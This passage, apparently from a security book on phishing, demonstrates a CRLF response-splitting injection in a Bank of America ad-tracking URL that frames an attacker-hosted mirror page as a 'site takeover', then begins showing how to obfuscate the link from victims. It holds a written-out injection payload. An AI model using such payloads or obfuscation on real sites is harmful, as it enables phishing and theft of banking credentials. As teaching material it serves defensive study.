
</frameset>
This simply replaces the site with our mirrored site, essentially performing a
“site takeover.” In the rules of HTML, we don’t have to finish the </frameset> if
we don’t want to; in an effort to shorten our code, it will still execute it without
the closing tag. So when implemented, our link can look like this:
http://www.bankofamerica.com/adtrack/index.cgi?adlink=000302078a4100008861%0
d%0a%0d%0a%3Ctitle%3EDon't%20Get%20Phished!%3C/title%3E%3Cframeset%3E%3Cfram
e%20src=%22http://ip.securescience.net/exploits/bofademo.html%22%20scrolling
=%22no%22%3E
Now to add some obfuscation to the link to hide our phishing site from
victims:
http://www.bankofamerica.com/adtrack/index.cgi?adlink=ProtectYourselfAgainst ...